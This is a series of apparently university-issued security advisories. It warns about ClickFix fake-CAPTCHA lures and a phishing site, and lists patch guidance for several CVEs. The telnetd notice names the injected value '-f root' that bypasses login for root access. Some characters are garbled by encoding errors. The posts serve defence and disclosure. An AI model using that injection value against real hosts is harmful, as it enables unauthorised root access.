What is ClickFix?

ClickFix is a social engineering technique where attackers compromise legitimate websites and replace normal verification steps such as CAPTCHAs with fake prompts, and instruct users to run malicious commands on their computers. These commands often involve opening the Windows Run dialog or PowerShell and pasting in a script that appears to “fix” a problem or “verify” the user. In reality, the script is being used to download malware that compromises your device.

This technique has been observed across higher‑education institutions and is increasingly used to deploy malware families such as , a backdoor capable of downloading additional payloads, collecting system information, and maintaining persistence on the device.

How does it Work?

ClickFix attacks follow a simple pattern:

1. You click on a link from a search result or ad, and as the page loads, a strange-looking CAPTCHA or pop‑up appears unexpectedly.
   
2. Instead of asking you to click images or check a box, it tells you there’s a “problem” and you need to run a command to continue.
   
3. The page instructs you to open Windows + R, PowerShell, or Terminal and paste in a line of text.
   
4. That command silently downloads malware onto your device. In many cases, it installs a backdoor such as CORNFLAKE.V3, which can download additional malicious files onto your system, collect system information, and stay hidden on your machine.

Because the attacker convinces you to run the command, your device treats it as a trusted action, making it much harder for security tools to block.

How Can I Spot a ClickFix Attempt?

Exercise caution towards any unfamiliar website, email, or popup that:

• Asks you to open Windows Run (Windows + R)
• Tells you to paste a command into PowerShell or Terminal
• Claims you must run a script to “fix,” “verify,” or “continue”
• Appears immediately after clicking a search result or ad
• Displays a CAPTCHA that looks unusual, low‑quality, or out of place

If you encounter instructions like:

“Press Windows + R and paste the following command…”

…it is almost certainly malicious.

If you suspect you may have interacted with a ClickFix prompt, please report it to the Information Security Team immediately (infosec@yorku.ca).

References:

• https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
• https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
• https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/

The post Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks appeared first on Information Security.

Severity level:-

CVSS Score: 9.8/Critical.

Description:-  The Ninja Forms – File Uploads plugin for WordPress fails to properly validate uploaded file types in the NF_FU_AJAX_Controllers_Uploads::handle_upload function. In vulnerable versions, this flaw allows unauthenticated attackers to upload arbitrary files, including malicious PHP scripts. Due to insufficient filename sanitization, attackers may also leverage path traversal techniques to place files in sensitive directories, such as the web root. Successful exploitation can result in remote code execution, web shell deployment, and complete takeover of the affected WordPress site.

Affected Versions��:-�� ��

All versions up to and including 3.3.26.

Impact:-

Successful exploitation may result in Remote code execution on the server.

Resolution:-

Upgrade immediately to Ninja Forms – File Uploads plugin version 3.3.27 or later.

Reference:-

UIT Information Security

The post Ninja Forms WordPress Plugin Vulnerability (CVE-2026-0740) appeared first on Information Security.

Severity level:-

CVSS Score: 9.6/Critical

Description:-  Zoom Workplace for Windows includes a Mail feature that processes user-supplied file references. In vulnerable versions, this component fails to properly validate file paths, enabling attackers to manipulate file system operations. This flaw allows an unauthenticated remote attacker to manipulate file system operations by supplying crafted path inputs. As a result, the attacker may escalate privileges on the affected system, gaining unauthorized access or control.

Affected Versions :-   

��������������������������������������������������������������������Zoom Workplace for Windows before version 6.6.0.

Impact:-

Successful exploitation potentially allows attackers to Escalate privileges on the target systems.

Resolution:-

Upgrade to Zoom Workplace for Windows version 6.6.0 or later immediately.

Reference:-

UIT Information Security

The post Zoom Workplace for Windows Vulnerability (CVE-2026-30903) appeared first on Information Security.

Severity level:-

CVSS Score: 7.8/high

Description:-  CVE‑2026‑20700 is a memory corruption vulnerability affecting Apple’s dyld (Dynamic Link Editor) component. Dyld is responsible for loading dynamic libraries and linking application code within Apple operating systems. Improper state management and insufficient memory‑safety controls can allow an attacker with memory write capability to achieve arbitrary code execution.

Affected Versions :-   

• iOS – versions prior to 26.3
• iPadOS – versions prior to 26.3
• iOS – versions prior to 18.7.5
• iPadOS – versions prior to 18.7.5
• macOS Tahoe – versions prior to 26.3
• macOS Sequoia – versions prior to 15.7.4
• macOS Sonoma – versions prior to 14.8.4
• tvOS – versions prior to 26.3
• watchOS – versions prior to 26.3
• visionOS – versions prior to 26.3

Impact:-

Successful exploitation may allow attackers to execute arbitrary code at the OS level.

Resolution:-

Update to the following patched OS versions or later:-

• iOS 26.3 / iPadOS 26.3
• macOS Tahoe 26.3
• tvOS 26.3
• watchOS 26.3
• visionOS 26.3
• iOS / iPadOS 18.7.5
• macOS Sequoia 15.7.4
• macOS Sonoma 14.8.4

Reference:-

UIT Information Security

The post Apple Memory Corruption Vulnerability (CVE‑2026‑20700) appeared first on Information Security.

Severity level:-

CVSS Score: 8.8/high

Description:-  Ingress‑NGINX is a widely used open‑source Kubernetes ingress controller responsible for managing inbound traffic to cluster services. A vulnerability exists in ingress‑nginx where the rules.http.paths.path field fails to properly validate user‑defined input. This flaw allows attackers to inject rogue NGINX configuration directives, enabling arbitrary code execution within the ingress‑nginx controller container.

Affected Versions :-   

��������������������������������������������������������������������All ingress-nginx versions prior to v1.13.7 and prior v1.14.3 are affected.

Impact:-

Successful exploitation allows attackers to execute arbitrary code inside the ingress-nginx controller.

Resolution:-

Upgrade to the version 1.13.7, 1.14.3 or later immediately.

Mitigation:-

Deploy a validating admission controller that rejects Ingress resources using the ImplementationSpecific path type, blocking the attack vector.

Reference:-

UIT Information Security

The post Ingress‑NGINX Configuration Injection Vulnerability (CVE-2026-24512) appeared first on Information Security.

The impersonation site is NOT affiliated with �첥��Ƶ and should be considered malicious. Do NOT enter your username, credentials, Duo 2FA codes, or any other personal information on this site as this may result in unauthorized access to your accounts.

The fraudulent site uses the URL <www.yorkuonline.com>, an image is shown below for reference:

Red Flags to Watch Out For

Unsolicited messages directing you to log in:
Messages claiming your account will be disabled, your mailbox is full, or your access is expiring are common tactics used to lure users to fake login pages.

Suspicious URL:
Official �첥��Ƶ login pages always use domains ending in yorku.ca. Any variation such as extra characters, misspellings, unfamiliar subdomains should be treated as suspicious.

Unexpected login prompts:
If you are asked to “verify your account”, “update your credentials” or “restore access” after clicking a link you did not expect, this is a strong indicator of a phishing attempt.

Requests for Duo/MFA passcodes:
�첥��Ƶ will never ask you to enter Duo 2FA codes outside of the official login process. Any site requesting your passcode directly should be considered malicious.

If you encounter any emails or messages directing you to this site, please report it using the Report Phishing button or forward the message to phishing@yorku.ca.

If you have already entered your credentials into the malicious site, change your password immediately by visiting . If you have any questions or concerns, please contact infosec@yorku.ca.

The post Phish Alert - Malicious Website Impersonating �첥��Ƶ appeared first on Information Security.

Severity level 

CVSS Score: 7.7/high

Description:- ��Notepad++ is a free and open-source source code editor. A vulnerability exists in Notepad++ versions prior to 8.8.9 involving the WinGUp updater, which fails to cryptographically verify downloaded update metadata and installer files. An attacker who can intercept or redirect update traffic may fraudulently supply a malicious installer that the updater will download and run. This can result in arbitrary code execution with the privileges of the user, potentially compromising the system. An attacker could use social engineering or clickjacking to trick users into downloading both the legitimate installer and a malicious executable to the same directory.��

Affected Versions��:-�� ��

• All versions prior to 8.8.9.

Impact:-

Successful exploitation enables attackers to execute arbitrary code potentially leading to compromise of affected systems.

Resolution:-

Update to the version 8.8.9 or later.

Reference:-

UIT Information Security

The post Notepad ++ Vulnerability (CVE-2025-15556) appeared first on Information Security.

A critical remote authentication bypass vulnerability (CVE-2026-24061) has been disclosed in the GNU InetUtils telnetd server, affecting versions 1.9.3 through 2.7.

Severity level 

CVSS Score: 9.8/Critical.

Description:- CVE-2026-24061 is an argument injection / authentication-bypass vulnerability in the telnetd component of GNU InetUtils. During Telnet NEW-ENVIRON negotiation, telnetd passes the attacker-controlled USER environment variable directly to the system login program without sanitization. If USER is set to -f root, login treats the session as pre‑authenticated, yielding an unauthenticated root shell. The flaw impacts GNU InetUtils 1.9.3 through 2.7 and is fixed in 2.8.

Affected Versions��:-�� ��

• GNU InetUtils package 1.9.3 – 2.7.

Impact:-

Successful exploitation allows unauthenticated remote attackers to bypass login and obtain root-level command execution on the affected host.

Resolution:-

Please Upgrade GNU InetUtils to version 2.8 or later.

Mitigation:-

• If you cannot upgrade immediately.
• Disable the telnetd service.
• Restrict access to Telnet to trusted management networks only.

Reference:-

UIT Information Security

The post GNU InetUtils telnetd authentication bypass (CVE-2026-24061) appeared first on Information Security.

Severity level 

CVSS Score: 8.7/High

Description:-��CVE-2025-14847, known as MongoBleed, is a heap-memory disclosure vulnerability in MongoDB Server. It arises in the server’s zlib compression handling logic, specifically in how it parses compressed network messages. By sending specially crafted messages with inconsistent length fields, an attacker can cause MongoDB to return uninitialized heap memory, potentially exposing sensitive in-memory data, without any authentication.

Affected Versions��:-��

• 8.2.x < 8.2.3.
• 8.0.x < 8.0.17.
• 7.0.x < 7.0.28.
• 6.0.x < 6.0.27.
• 5.0.x < 5.0.32.
• 4.4.x < 4.4.30.
• All 4.2.x, 4.0.x.
• 3.6.x versions.

Impact:- MongoDB can handle sensitive information such as PII, authentication credentials, tokens, keys, and operational metadata. Memory leaks may expose authentication tokens and secrets, database session data, and PII. Even a read-only leak can enable credential compromise, leading to data theft or full system takeover.

Resolution:-

• Patch immediately to: 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, 4.4.30, or newer.
• If patching is delayed: Disable zlib compression using networkMessageCompressors without zlib, and restrict network access to trusted IPs only.
• Enable verbose JSON logging to track connection metadata and parsing errors.
• Scan logs for bursty connections with missing metadata from suspicious IPs.
• If exploitation is suspected, contact infosec@yorku.ca, rotate secrets such as tokens, keys, and credentials that may have been leaked.��

Reference:

UIT - Information Security

The post CVE-2025-14847 - MongoBleed - Vulnerability Affecting MongoDB appeared first on Information Security.

Severity level 

CVSS Score: 7.8/high

Description:- CVE-2025-54100 is a command injection vulnerability in Windows PowerShell, specifically affecting the Invoke-WebRequest cmdlet. The flaw occurs because PowerShell automatically parses HTML content using the MSHTML engine, which can inadvertently execute embedded scripts during parsing. This behavior allows attackers to craft malicious web content that, when processed by Invoke-WebRequest, could lead to unintended script execution. Exploitation requires local access and user interaction, such as running a script that invokes Invoke-WebRequest on a malicious URL.

Affected Versions :-   All systems using Windows PowerShell 5.1 on vulnerable Windows versions.

• Windows 10.
• Windows 11.
• Windows Server (2008 through 2025 editions).

Impact:-

Successful exploitation of this vulnerability may allow attackers to execute arbitrary code on the affected system.

After applying the patch, users will receive a security warning prompt before parsing any web content that could execute scripts.

Resolution:-

Please apply the latest Security updates released by Microsoft.

Reference:-

UIT Information Security

The post PowerShell Remote Code Execution (CVE-2025-54100) appeared first on Information Security.